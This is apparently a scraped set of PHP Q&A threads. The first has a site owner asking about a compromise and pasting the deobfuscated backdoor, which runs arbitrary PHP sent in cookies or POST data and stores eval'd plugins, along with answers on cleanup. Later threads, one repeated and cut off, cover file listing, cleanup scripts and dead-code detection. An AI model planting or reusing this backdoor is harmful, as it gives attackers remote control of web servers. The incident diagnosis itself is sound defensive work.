Related
I have three websites all hosted on the same webserver. Recently I was working on one of the websites and noticed that, about a month ago, a bunch of files had been changed. Specifically, all instances of index.html had been renamed to index.html.bak.bak, and index.php files have been put in their places. The index.php files are relatively simple; they include a file hidden somewhere in each website's filesystem (seemingly a random folder) that's been obfuscated with JS hex encoding, then echo the original index.html:
<?php
/*2d4f2*/
#include "\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31/\x338\x304\x323\x2f4\x365\x380\x39/\x77w\x77.\x77e\x62s\x69t\x65.\x63o\x6d/\x77e\x62/\x63o\x6et\x65n\x74/\x77p\x2di\x6ec\x6cu\x64e\x73/\x6as\x2fs\x77f\x75p\x6co\x61d\x2ff\x61v\x69c\x6fn\x5f2\x391\x337\x32.\x69c\x6f";
/*2d4f2*/
echo file_get_contents('index.html.bak.bak');
The included file here was
/mnt/*snip*/www.website.com/web/content/wp-includes/js/swfupload/favicon_291372.ico
On another domain, it was
/mnt/*snip*/www.website2.com/web/content/wiki/maintenance/hiphop/favicon_249bed.ico
As you could probably guess, these aren't actually favicons - they're just php files with a different extension. Now, I have no clue what these files do (which is why I'm asking here). They were totally obfuscated, but https://malwaredecoder.com/ seems to be able to crack through it. The results can be found here, but I've pasted the de-obfuscated code below:
#ini_set('error_log', NULL);
#ini_set('log_errors', 0);
#ini_set('max_execution_time', 0);
#error_reporting(0);
#set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);
$data = NULL;
$data_key = NULL;
$GLOBALS['cs_auth'] = '8debdf89-dfb8-4968-8667-04713f279109';
global $cs_auth;
if (!function_exists('file_put_contents'))
{
function file_put_contents($n, $d, $flag = False)
{
$mode = $flag == 8 ? 'a' : 'w';
$f = #fopen($n, $mode);
if ($f === False)
{
return 0;
}
else
{
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
if (!function_exists('file_get_contents'))
{
function file_get_contents($filename)
{
$fhandle = fopen($filename, "r");
$fcontents = fread($fhandle, filesize($filename));
fclose($fhandle);
return $fcontents;
}
}
function cs_get_current_filepath()
{
return trim(preg_replace("/\(.*\$/", '', __FILE__));
}
function cs_decrypt_phase($data, $key)
{
$out_data = "";
for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
function cs_decrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
}
function cs_encrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
}
function cs_get_plugin_config()
{
$self_content = #file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config = substr($self_content, $config_pos + 32);
$plugins = #unserialize(cs_decrypt(base64_decode($config), md5(cs_get_current_filepath())));
}
else
{
$plugins = Array();
}
return $plugins;
}
function cs_set_plugin_config($plugins)
{
$config_enc = base64_encode(cs_encrypt(#serialize($plugins), md5(cs_get_current_filepath())));
$self_content = #file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config_old = substr($self_content, $config_pos + 32);
$self_content = str_replace($config_old, $config_enc, $self_content);
}
else
{
$self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
}
#file_put_contents(cs_get_current_filepath(), $self_content);
}
function cs_plugin_add($name, $base64_data)
{
$plugins = cs_get_plugin_config();
$plugins[$name] = base64_decode($base64_data);
cs_set_plugin_config($plugins);
}
function cs_plugin_rem($name)
{
$plugins = cs_get_plugin_config();
unset($plugins[$name]);
cs_set_plugin_config($plugins);
}
function cs_plugin_load($name=NULL)
{
foreach (cs_get_plugin_config() as $pname=>$pcontent)
{
if ($name)
{
if (strcmp($name, $pname) == 0)
{
eval($pcontent);
break;
}
}
else
{
eval($pcontent);
}
}
}
foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
$data = #unserialize(cs_decrypt(base64_decode($data), $data_key));
if (isset($data['ak']) && $cs_auth==$data['ak'])
{
if ($data['a'] == 'i')
{
$i = Array(
'pv' => #phpversion(),
'sv' => '2.0-1',
'ak' => $data['ak'],
);
echo #serialize($i);
exit;
}
elseif ($data['a'] == 'e')
{
eval($data['d']);
}
elseif ($data['a'] == 'plugin')
{
if($data['sa'] == 'add')
{
cs_plugin_add($data['p'], $data['d']);
}
elseif($data['sa'] == 'rem')
{
cs_plugin_rem($data['p']);
}
}
echo $data['ak'];
}
cs_plugin_load();
}
In addition, there is a file called init5.php in one of the website's content folders, which after deobfuscating as much as possible, becomes:
$GLOBALS['893\Gt3$3'] = $_POST;
$GLOBALS['S9]<\<\$'] = $_COOKIE;
#>P>r"$,('$66N6rTNj', NULL);
#>P>r"$,('TNjr$66N6"', 0);
#>P>r"$,('k3'r$'$9#,>NPr,>k$', 0);
#"$,r,>k$rT>k>,(0);
$w6f96424 = NULL;
$s02c4f38 = NULL;
global $y10a790;
function a31f0($w6f96424, $afb8d)
{
$p98c0e = "";
for ($r035e7=0; $r035e7<",6T$P($w6f96424);)
{
for ($l545=0; $l545<",6T$P($afb8d) && $r035e7<",6T$P($w6f96424); $l545++, $r035e7++)
{
$p98c0e .= 9)6(N6`($w6f96424[$r035e7]) ^ N6`($afb8d[$l545]));
}
}
return $p98c0e;
}
function la30956($w6f96424, $afb8d)
{
global $y10a790;
return 3\x9<(3\x9<($w6f96424, $y10a790), $afb8d);
}
foreach ($GLOBALS['S9]<\<\$'] as $afb8d=>$ua56c9d)
{
$w6f96424 = $ua56c9d;
$s02c4f38 = $afb8d;
}
if (!$w6f96424)
{
foreach ($GLOBALS['893\Gt3$3'] as $afb8d=>$ua56c9d)
{
$w6f96424 = $ua56c9d;
$s02c4f38 = $afb8d;
}
}
$w6f96424 = ##P"$6>3T>a$(T3\<]tO(R3"$OIr`$9N`$($w6f96424), $s02c4f38));
if (isset($w6f96424['38']) && $y10a790==$w6f96424['38'])
{
if ($w6f96424['3'] == '>')
{
$r035e7 = Array(
'#=' => ##)#=$6">NP(),
'"=' => 'x%<Fx',
);
echo #"$6>3T>a$($r035e7);
}
elseif ($w6f96424['3'] == '$')
{
eval($w6f96424['`']);
}
}
There are more obfuscated PHP files the more I look, which is kinda scary. There's tons of them. Even Wordpress' index.php files seem to have been infected; the obfuscated #includes have been added to them. In addition, on one of the websites, there's a file titled 'ssh' that seems to be some kind of binary file (maybe the 'ssh' program itself?)
Does anyone know what these are or do? How did they get on my server? How can I get rid of them and make sure they never comes back?
Some other info: my webhost is Laughing Squid; I have no shell access. The server runs Linux, Apache 2.4, and PHP 5.6.29. Thank you!
You can't trust anything on the server at this point.
Reinstall the OS
Reinstall known good copies of your code with a clean or known-good version of the database.
At this point there's no use in just replacing/deleting "bad" files because the attacker could have done absolutely anything ranging from "nothing" to replacing system level software with hacked versions that will do anything desired. Just for an example, at one point someone wrote malware into a compiler so even if the executable was rebuilt, the maware was still there, also it prevented the debugger from detecting it.
There are various cleaners available, but they rely on knowing/detecting/undoing everything the attacker might have done, which is impossible.
If you had good daily backups, you could do a diff between the "what you have" and "what you had before" and see what has changed, however you would still need to carefully examine or restore your database since many attacks involve changing data, not code.
This is not a hack you need to trash your sites and server over. It is just a php hack. Get rid of all of the malicious php files and code and you'll be good. Here is how I did it on drupal. http://rankinstudio.com/Drupal_ico_index_hack
I had this same malware. There are 10 to 15 files the malware adds or modifies. I used the Quttera WordPress plug-in(free) to find the files. Most of the files can just be deleted (Be careful, Quttera ids more than are actually infected) but some WordPress files were modified and must be replaced.
Had to write myself one PHP script to scan the whole server tree, listing all directory paths, and one to scan those paths for infections. Can only partly clean, but provides much needed help with the pedestrian cleanup.
NOTE:
It's poorly written, and probably should be removed after use. But it helped me.
A zipped copy is here.
No guarantees; unzip it and take a look what you put on your server, before uploading it!
Update: Now cleans more (not all!). Follow up with hand-cleaning (see below).
I had the same problem.
It is caused by malicious http post requests.
Here is a good article about how to stop it:
The following in a .htaccess file will stop all post requests.
https://perishablepress.com/protect-post-requests/
# deny all POST requests
<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_METHOD} POST
RewriteRule .* - [F,L]
</IfModule>
I haven't found yet, how to prevent these files from appearing on my server, yet i'm able to get rid of them, here's a oneliner crawling down the folders and removing them:
find . -type f -name 'favicon_*.ico' -delete -print
So I have this app that processes CSV files. I have a line of code to load the file.
$myFile = "data/FrontlineSMS_Message_Export_20120721.csv"; //The name of the CSV file
$fh = fopen($myFile, 'r'); //Open the file
I would like to find a way in which I could look in the data directory and get the newest file (they all have date tags so they would be in order inside of data) and set the name equal to $myFile.
I really couldn't find and understand the documentation of php directories so any helpful resources would be appreciated as well. Thank you.
Here's an attempt using scandir, assuming the only files in the directory have timestamped filenames:
$files = scandir('data', SCANDIR_SORT_DESCENDING);
$newest_file = $files[0];
We first list all files in the directory in descending order, then, whichever one is first in that list has the "greatest" filename — and therefore the greatest timestamp value — and is therefore the newest.
Note that scandir was added in PHP 5, but its documentation page shows how to implement that behavior in PHP 4.
For a search with wildcard you can use:
<?php
$path = "/var/www/html/*";
$latest_ctime = 0;
$latest_filename = '';
$files = glob($path);
foreach($files as $file)
{
if (is_file($file) && filectime($file) > $latest_ctime)
{
$latest_ctime = filectime($file);
$latest_filename = $file;
}
}
return $latest_filename;
?>
My solution, improved solution from Max Hofmann:
$ret = [];
$dir = Yii::getAlias("#app") . "/web/uploads/problem-letters/{$this->id}"; // set directory in question
if(is_dir($dir)) {
$ret = array_diff(scandir($dir), array(".", "..")); // get all files in dir as array and remove . and .. from it
}
usort($ret, function ($a, $b) use ($dir) {
if(filectime($dir . "/" . $a) < filectime($dir . "/" . $b)) {
return -1;
} else if(filectime($dir . "/" . $a) == filectime($dir . "/" . $b)) {
return 0;
} else {
return 1;
}
}); // sort array by file creation time, older first
echo $ret[count($ret)-1]; // filename of last created file
Here's an example where I felt more confident in using my own validator rather than simply relying on a timestamp with scandir().
In this context, I want to check if my server has a more recent file version than the client's version. So I compare version numbers from the file names.
$clientAppVersion = "1.0.5";
$latestVersionFileName = "";
$directory = "../../download/updates/darwin/"
$arrayOfFiles = scandir($directory);
foreach ($arrayOfFiles as $file) {
if (is_file($directory . $file)) {
// Your custom code here... For example:
$serverFileVersion = getVersionNumberFromFileName($file);
if (isVersionNumberGreater($serverFileVersion, $clientAppVersion)) {
$latestVersionFileName = $file;
}
}
}
// function declarations in my php file (used in the forEach loop)
function getVersionNumberFromFileName($fileName) {
// extract the version number with regEx replacement
return preg_replace("/Finance D - Tenue de livres-darwin-(x64|arm64)-|\.zip/", "", $fileName);
}
function removeAllNonDigits($semanticVersionString) {
// use regex replacement to keep only numeric values in the semantic version string
return preg_replace("/\D+/", "", $semanticVersionString);
}
function isVersionNumberGreater($serverFileVersion, $clientFileVersion): bool {
// receives two semantic versions (1.0.4) and compares their numeric value (104)
// true when server version is greater than client version (105 > 104)
return removeAllNonDigits($serverFileVersion) > removeAllNonDigits($clientFileVersion);
}
Using this manual comparison instead of a timestamp I can achieve a more surgical result. I hope this can give you some useful ideas if you have a similar requirement.
(PS: I took time to post because I was not satisfied with the answers I found relating to the specific requirement I had. Please be kind I'm also not very used to StackOverflow - Thanks!)
I have a couple of PHP scripts for deleting error_log, .DS_Store etc files from all folders on my entire server. I simply have these scripts uploaded to my root (public_html) and visit them periodically when I want to do a little cleanup. When I visit the URL of where the scripts are loaded it automatically gets to work. That's all perfect and how I'd like to continue using it.
However, I'd love to consolidate this automation into just one script where I can list an array of the undesirable files like so:
$unwanted_filenames = array(
'.DS_Store',
'.localized',
'Thumbs.db',
'error_log'
);
And simply run through all folders and delete all the files of which I've listed in the array.
The scripts I use now are overkill, listing out every individual file and how much it's freed up etc. I'm a minimalist and would love the simplest script with the least amount of code to just get the job done.
So when I visit the page it automatically get's to work, a white screen of nothing is fine and then maybe a simple "Done. Freed up 3MB." message. That's it.
OK - here's the shortest but of PHP I can think of that'll do it:
$unwanted_filenames = array(
'.DS_Store',
'.localized',
'Thumbs.db',
'error_log'
);
$it = new RecursiveDirectoryIterator("/"); // Set starting directory here
foreach(new RecursiveIteratorIterator($it) as $file) {
if (in_array(basename($file), $unwanted_filenames)) {
#unlink($file); // THe # hides errors, remove if you want to see them
}
}
Hopefully self-explanatory - and yes, it does subdirectories (that's the "recursive" bit).
And you said minamalistic, so I didn't include the freed space, but just add a $FreedSpace += filesize($file) before the unlink if you want to add that in.
I'm using this, you can do it like this:
<?php
$dir = "/var/www/vhosts/"; //Write your dirname here
$rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));
$total_thumbs = 0;
$total_ds = 0;
foreach ($rii as $file) {
if ($file->isDir()){
continue;
}
$parcala = explode('.', $file->getFilename());
$uzanti = end($parcala);
if ($file->getFilename() == 'Thumbs.db') {
unlink($file->getPathname());
$total_thumbs++;
}
if ($uzanti == '.DS_Store' || $file->getFilename() == 'DS_Store' || $file->getFilename() == '.DS_Store') {
unlink($file->getPathname());
$total_ds++;
}
}
echo $total_thumbs . ' Thumbs.db file and ' . $total_ds . ' DS_Store file deleted!';
And if you want automation you can use Cronjob
How can I find any unused functions in a PHP project?
Are there features or APIs built into PHP that will allow me to analyse my codebase - for example Reflection, token_get_all()?
Are these APIs feature rich enough for me not to have to rely on a third party tool to perform this type of analysis?
You can try Sebastian Bergmann's Dead Code Detector:
phpdcd is a Dead Code Detector (DCD) for PHP code. It scans a PHP project for all declared functions and methods and reports those as being "dead code" that are not called at least once.
Source: https://github.com/sebastianbergmann/phpdcd
Note that it's a static code analyzer, so it might give false positives for methods that only called dynamically, e.g. it cannot detect $foo = 'fn'; $foo();
You can install it via PEAR:
pear install phpunit/phpdcd-beta
After that you can use with the following options:
Usage: phpdcd [switches] <directory|file> ...
--recursive Report code as dead if it is only called by dead code.
--exclude <dir> Exclude <dir> from code analysis.
--suffixes <suffix> A comma-separated list of file suffixes to check.
--help Prints this usage information.
--version Prints the version and exits.
--verbose Print progress bar.
More tools:
https://phpqa.io/
Note: as per the repository notice, this project is no longer maintained and its repository is only kept for archival purposes. So your mileage may vary.
Thanks Greg and Dave for the feedback. Wasn't quite what I was looking for, but I decided to put a bit of time into researching it and came up with this quick and dirty solution:
<?php
$functions = array();
$path = "/path/to/my/php/project";
define_dir($path, $functions);
reference_dir($path, $functions);
echo
"<table>" .
"<tr>" .
"<th>Name</th>" .
"<th>Defined</th>" .
"<th>Referenced</th>" .
"</tr>";
foreach ($functions as $name => $value) {
echo
"<tr>" .
"<td>" . htmlentities($name) . "</td>" .
"<td>" . (isset($value[0]) ? count($value[0]) : "-") . "</td>" .
"<td>" . (isset($value[1]) ? count($value[1]) : "-") . "</td>" .
"</tr>";
}
echo "</table>";
function define_dir($path, &$functions) {
if ($dir = opendir($path)) {
while (($file = readdir($dir)) !== false) {
if (substr($file, 0, 1) == ".") continue;
if (is_dir($path . "/" . $file)) {
define_dir($path . "/" . $file, $functions);
} else {
if (substr($file, - 4, 4) != ".php") continue;
define_file($path . "/" . $file, $functions);
}
}
}
}
function define_file($path, &$functions) {
$tokens = token_get_all(file_get_contents($path));
for ($i = 0; $i < count($tokens); $i++) {
$token = $tokens[$i];
if (is_array($token)) {
if ($token[0] != T_FUNCTION) continue;
$i++;
$token = $tokens[$i];
if ($token[0] != T_WHITESPACE) die("T_WHITESPACE");
$i++;
$token = $tokens[$i];
if ($token[0] != T_STRING) die("T_STRING");
$functions[$token[1]][0][] = array($path, $token[2]);
}
}
}
function reference_dir($path, &$functions) {
if ($dir = opendir($path)) {
while (($file = readdir($dir)) !== false) {
if (substr($file, 0, 1) == ".") continue;
if (is_dir($path . "/" . $file)) {
reference_dir($path . "/" . $file, $functions);
} else {
if (substr($file, - 4, 4) != ".php") continue;
reference_file($path . "/" . $file, $functions);
}
}
}
}
function reference_file($path, &$functions) {
$tokens = token_get_all(file_get_contents($path));
for ($i = 0; $i < count($tokens); $i++) {
$token = $tokens[$i];
if (is_array($token)) {
if ($token[0] != T_STRING) continue;
if ($tokens[$i + 1] != "(") continue;
$functions[$token[1]][1][] = array($path, $token[2]);
}
}
}
?>
I'll probably spend some more time on it so I can quickly find the files and line numbers of the function definitions and references; this information is being gathered, just not displayed.
This bit of bash scripting might help:
grep -rhio ^function\ .*\( .|awk -F'[( ]' '{print "echo -n " $2 " && grep -rin " $2 " .|grep -v function|wc -l"}'|bash|grep 0
This basically recursively greps the current directory for function definitions, passes the hits to awk, which forms a command to do the following:
print the function name
recursively grep for it again
piping that output to grep -v to filter out function definitions so as to retain calls to the function
pipes this output to wc -l which prints the line count
This command is then sent for execution to bash and the output is grepped for 0, which would indicate 0 calls to the function.
Note that this will not solve the problem calebbrown cites above, so there might be some false positives in the output.
USAGE: find_unused_functions.php <root_directory>
NOTE: This is a ‘quick-n-dirty’ approach to the problem. This script only performs a lexical pass over the files, and does not respect situations where different modules define identically named functions or methods. If you use an IDE for your PHP development, it may offer a more comprehensive solution.
Requires PHP 5
To save you a copy and paste, a direct download, and any new versions, are available here.
#!/usr/bin/php -f
<?php
// ============================================================================
//
// find_unused_functions.php
//
// Find unused functions in a set of PHP files.
// version 1.3
//
// ============================================================================
//
// Copyright (c) 2011, Andrey Butov. All Rights Reserved.
// This script is provided as is, without warranty of any kind.
//
// http://www.andreybutov.com
//
// ============================================================================
// This may take a bit of memory...
ini_set('memory_limit', '2048M');
if ( !isset($argv[1]) )
{
usage();
}
$root_dir = $argv[1];
if ( !is_dir($root_dir) || !is_readable($root_dir) )
{
echo "ERROR: '$root_dir' is not a readable directory.\n";
usage();
}
$files = php_files($root_dir);
$tokenized = array();
if ( count($files) == 0 )
{
echo "No PHP files found.\n";
exit;
}
$defined_functions = array();
foreach ( $files as $file )
{
$tokens = tokenize($file);
if ( $tokens )
{
// We retain the tokenized versions of each file,
// because we'll be using the tokens later to search
// for function 'uses', and we don't want to
// re-tokenize the same files again.
$tokenized[$file] = $tokens;
for ( $i = 0 ; $i < count($tokens) ; ++$i )
{
$current_token = $tokens[$i];
$next_token = safe_arr($tokens, $i + 2, false);
if ( is_array($current_token) && $next_token && is_array($next_token) )
{
if ( safe_arr($current_token, 0) == T_FUNCTION )
{
// Find the 'function' token, then try to grab the
// token that is the name of the function being defined.
//
// For every defined function, retain the file and line
// location where that function is defined. Since different
// modules can define a functions with the same name,
// we retain multiple definition locations for each function name.
$function_name = safe_arr($next_token, 1, false);
$line = safe_arr($next_token, 2, false);
if ( $function_name && $line )
{
$function_name = trim($function_name);
if ( $function_name != "" )
{
$defined_functions[$function_name][] = array('file' => $file, 'line' => $line);
}
}
}
}
}
}
}
// We now have a collection of defined functions and
// their definition locations. Go through the tokens again,
// and find 'uses' of the function names.
foreach ( $tokenized as $file => $tokens )
{
foreach ( $tokens as $token )
{
if ( is_array($token) && safe_arr($token, 0) == T_STRING )
{
$function_name = safe_arr($token, 1, false);
$function_line = safe_arr($token, 2, false);;
if ( $function_name && $function_line )
{
$locations_of_defined_function = safe_arr($defined_functions, $function_name, false);
if ( $locations_of_defined_function )
{
$found_function_definition = false;
foreach ( $locations_of_defined_function as $location_of_defined_function )
{
$function_defined_in_file = $location_of_defined_function['file'];
$function_defined_on_line = $location_of_defined_function['line'];
if ( $function_defined_in_file == $file &&
$function_defined_on_line == $function_line )
{
$found_function_definition = true;
break;
}
}
if ( !$found_function_definition )
{
// We found usage of the function name in a context
// that is not the definition of that function.
// Consider the function as 'used'.
unset($defined_functions[$function_name]);
}
}
}
}
}
}
print_report($defined_functions);
exit;
// ============================================================================
function php_files($path)
{
// Get a listing of all the .php files contained within the $path
// directory and its subdirectories.
$matches = array();
$folders = array(rtrim($path, DIRECTORY_SEPARATOR));
while( $folder = array_shift($folders) )
{
$matches = array_merge($matches, glob($folder.DIRECTORY_SEPARATOR."*.php", 0));
$moreFolders = glob($folder.DIRECTORY_SEPARATOR.'*', GLOB_ONLYDIR);
$folders = array_merge($folders, $moreFolders);
}
return $matches;
}
// ============================================================================
function safe_arr($arr, $i, $default = "")
{
return isset($arr[$i]) ? $arr[$i] : $default;
}
// ============================================================================
function tokenize($file)
{
$file_contents = file_get_contents($file);
if ( !$file_contents )
{
return false;
}
$tokens = token_get_all($file_contents);
return ($tokens && count($tokens) > 0) ? $tokens : false;
}
// ============================================================================
function usage()
{
global $argv;
$file = (isset($argv[0])) ? basename($argv[0]) : "find_unused_functions.php";
die("USAGE: $file <root_directory>\n\n");
}
// ============================================================================
function print_report($unused_functions)
{
if ( count($unused_functions) == 0 )
{
echo "No unused functions found.\n";
}
$count = 0;
foreach ( $unused_functions as $function => $locations )
{
foreach ( $locations as $location )
{
echo "'$function' in {$location['file']} on line {$location['line']}\n";
$count++;
}
}
echo "=======================================\n";
echo "Found $count unused function" . (($count == 1) ? '' : 's') . ".\n\n";
}
// ============================================================================
/* EOF */
2020 Update
I have used the other methods outlined above, even the 2019 update answer here is outdated.
Tomáš Votruba's answer led me to find Phan as the ECS route has now been deprecated. Symplify have removed the dead public method checker.
Phan is a static analyzer for PHP
We can utilise Phan to search for dead code. Here are the steps to take using composer to install. These steps are also found on the git repo for phan. These instructions assume you're at the root of your project.
Step 1 - Install Phan w/ composer
composer require phan/phan
Step 2 - Install php-ast
PHP-AST is a requirement for Phan
As I'm using WSL, I've been able to use PECL to install, however, other install methods for php-ast can be found in a git repo
pecl install ast
Step 3 - Locate and edit php.ini to use php-ast
Locate current php.ini
php -i | grep 'php.ini'
Now take that file location and nano (or whichever of your choice to edit this doc). Locate the area of all extensions and ADD the following line:
extension=ast.so
Step 4 - create a config file for Phan
Steps on config file can be found in Phan's documentation on how to create a config file
You'll want to use their sample one as it's a good starting point. Edit the following arrays to add your own paths on both
directory_list & exclude_analysis_directory_list.
Please note that exclude_analysis_directory_list will still be parsed but not validated eg. adding Wordpress directory here would mean, false positives for called wordpress functions in your theme would not appear as it found the function in wordpress but at the same time it'll not validate functions in wordpress' folder.
Mine looked like this
......
'directory_list' => [
'public_html'
],
......
'exclude_analysis_directory_list' => [
'vendor/',
'public_html/app/plugins',
'public_html/app/mu-plugins',
'public_html/admin'
],
......
Step 5 - Run Phan with dead code detection
Now that we've installed phan and ast, configured the folders we wish to parse, it's time to run Phan. We'll be passing an argument to phan --dead-code-detection which is self explanatory.
./vendor/bin/phan --dead-code-detection
This output will need verifying with a fine tooth comb but it's certainly the best place to start
The output will look like this in console
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
Please feel free to add to this answer or correct my mistakes :)
If I remember correctly you can use phpCallGraph to do that. It'll generate a nice graph (image) for you with all the methods involved. If a method is not connected to any other, that's a good sign that the method is orphaned.
Here's an example: classGallerySystem.png
The method getKeywordSetOfCategories() is orphaned.
Just by the way, you don't have to take an image -- phpCallGraph can also generate a text file, or a PHP array, etc..
Because PHP functions/methods can be dynamically invoked, there is no programmatic way to know with certainty if a function will never be called.
The only certain way is through manual analysis.
2019+ Update
I got inspied by Andrey's answer and turned this into a coding standard sniff.
The detection is very simple yet powerful:
finds all methods public function someMethod()
then find all method calls ${anything}->someMethod()
and simply reports those public functions that were never called
It helped me to remove over 20+ methods I would have to maintain and test.
3 Steps to Find them
Install ECS:
composer require symplify/easy-coding-standard --dev
Set up ecs.yaml config:
# ecs.yaml
services:
Symplify\CodingStandard\Sniffs\DeadCode\UnusedPublicMethodSniff: ~
Run the command:
vendor/bin/ecs check src
See reported methods and remove those you don't fine useful 👍
You can read more about it here: Remove Dead Public Methods from Your Code
phpxref will identify where functions are called from which would facilitate the analysis - but there's still a certain amount of manual effort involved.
afaik there is no way. To know which functions "are belonging to whom" you would need to execute the system (runtime late binding function lookup).
But Refactoring tools are based on static code analysis. I really like dynamic typed languages, but in my view they are difficult to scale. The lack of safe refactorings in large codebases and dynamic typed languages is a major drawback for maintainability and handling software evolution.
How can I find any unused functions in a PHP project?
Are there features or APIs built into PHP that will allow me to analyse my codebase - for example Reflection, token_get_all()?
Are these APIs feature rich enough for me not to have to rely on a third party tool to perform this type of analysis?
You can try Sebastian Bergmann's Dead Code Detector:
phpdcd is a Dead Code Detector (DCD) for PHP code. It scans a PHP project for all declared functions and methods and reports those as being "dead code" that are not called at least once.
Source: https://github.com/sebastianbergmann/phpdcd
Note that it's a static code analyzer, so it might give false positives for methods that only called dynamically, e.g. it cannot detect $foo = 'fn'; $foo();
You can install it via PEAR:
pear install phpunit/phpdcd-beta
After that you can use with the following options:
Usage: phpdcd [switches] <directory|file> ...
--recursive Report code as dead if it is only called by dead code.
--exclude <dir> Exclude <dir> from code analysis.
--suffixes <suffix> A comma-separated list of file suffixes to check.
--help Prints this usage information.
--version Prints the version and exits.
--verbose Print progress bar.
More tools:
https://phpqa.io/
Note: as per the repository notice, this project is no longer maintained and its repository is only kept for archival purposes. So your mileage may vary.
Thanks Greg and Dave for the feedback. Wasn't quite what I was looking for, but I decided to put a bit of time into researching it and came up with this quick and dirty solution:
<?php
$functions = array();
$path = "/path/to/my/php/project";
define_dir($path, $functions);
reference_dir($path, $functions);
echo
"<table>" .
"<tr>" .
"<th>Name</th>" .
"<th>Defined</th>" .
"<th>Referenced</th>" .
"</tr>";
foreach ($functions as $name => $value) {
echo
"<tr>" .
"<td>" . htmlentities($name) . "</td>" .
"<td>" . (isset($value[0]) ? count($value[0]) : "-") . "</td>" .
"<td>" . (isset($value[1]) ? count($value[1]) : "-") . "</td>" .
"</tr>";
}
echo "</table>";
function define_dir($path, &$functions) {
if ($dir = opendir($path)) {
while (($file = readdir($dir)) !== false) {
if (substr($file, 0, 1) == ".") continue;
if (is_dir($path . "/" . $file)) {
define_dir($path . "/" . $file, $functions);
} else {
if (substr($file, - 4, 4) != ".php") continue;
define_file($path . "/" . $file, $functions);
}
}
}
}
function define_file($path, &$functions) {
$tokens = token_get_all(file_get_contents($path));
for ($i = 0; $i < count($tokens); $i++) {
$token = $tokens[$i];
if (is_array($token)) {
if ($token[0] != T_FUNCTION) continue;
$i++;
$token = $tokens[$i];
if ($token[0] != T_WHITESPACE) die("T_WHITESPACE");
$i++;
$token = $tokens[$i];
if ($token[0] != T_STRING) die("T_STRING");
$functions[$token[1]][0][] = array($path, $token[2]);
}
}
}
function reference_dir($path, &$functions) {
if ($dir = opendir($path)) {
while (($file = readdir($dir)) !== false) {
if (substr($file, 0, 1) == ".") continue;
if (is_dir($path . "/" . $file)) {
reference_dir($path . "/" . $file, $functions);
} else {
if (substr($file, - 4, 4) != ".php") continue;
reference_file($path . "/" . $file, $functions);
}
}
}
}
function reference_file($path, &$functions) {
$tokens = token_get_all(file_get_contents($path));
for ($i = 0; $i < count($tokens); $i++) {
$token = $tokens[$i];
if (is_array($token)) {
if ($token[0] != T_STRING) continue;
if ($tokens[$i + 1] != "(") continue;
$functions[$token[1]][1][] = array($path, $token[2]);
}
}
}
?>
I'll probably spend some more time on it so I can quickly find the files and line numbers of the function definitions and references; this information is being gathered, just not displayed.
This bit of bash scripting might help:
grep -rhio ^function\ .*\( .|awk -F'[( ]' '{print "echo -n " $2 " && grep -rin " $2 " .|grep -v function|wc -l"}'|bash|grep 0
This basically recursively greps the current directory for function definitions, passes the hits to awk, which forms a command to do the following:
print the function name
recursively grep for it again
piping that output to grep -v to filter out function definitions so as to retain calls to the function
pipes this output to wc -l which prints the line count
This command is then sent for execution to bash and the output is grepped for 0, which would indicate 0 calls to the function.
Note that this will not solve the problem calebbrown cites above, so there might be some false positives in the output.
USAGE: find_unused_functions.php <root_directory>
NOTE: This is a ‘quick-n-dirty’ approach to the problem. This script only performs a lexical pass over the files, and does not respect situations where different modules define identically named functions or methods. If you use an IDE for your PHP development, it may offer a more comprehensive solution.
Requires PHP 5
To save you a copy and paste, a direct download, and any new versions, are available here.
#!/usr/bin/php -f
<?php
// ============================================================================
//
// find_unused_functions.php
//
// Find unused functions in a set of PHP files.
// version 1.3
//
// ============================================================================
//
// Copyright (c) 2011, Andrey Butov. All Rights Reserved.
// This script is provided as is, without warranty of any kind.
//
// http://www.andreybutov.com
//
// ============================================================================
// This may take a bit of memory...
ini_set('memory_limit', '2048M');
if ( !isset($argv[1]) )
{
usage();
}
$root_dir = $argv[1];
if ( !is_dir($root_dir) || !is_readable($root_dir) )
{
echo "ERROR: '$root_dir' is not a readable directory.\n";
usage();
}
$files = php_files($root_dir);
$tokenized = array();
if ( count($files) == 0 )
{
echo "No PHP files found.\n";
exit;
}
$defined_functions = array();
foreach ( $files as $file )
{
$tokens = tokenize($file);
if ( $tokens )
{
// We retain the tokenized versions of each file,
// because we'll be using the tokens later to search
// for function 'uses', and we don't want to
// re-tokenize the same files again.
$tokenized[$file] = $tokens;
for ( $i = 0 ; $i < count($tokens) ; ++$i )
{
$current_token = $tokens[$i];
$next_token = safe_arr($tokens, $i + 2, false);
if ( is_array($current_token) && $next_token && is_array($next_token) )
{
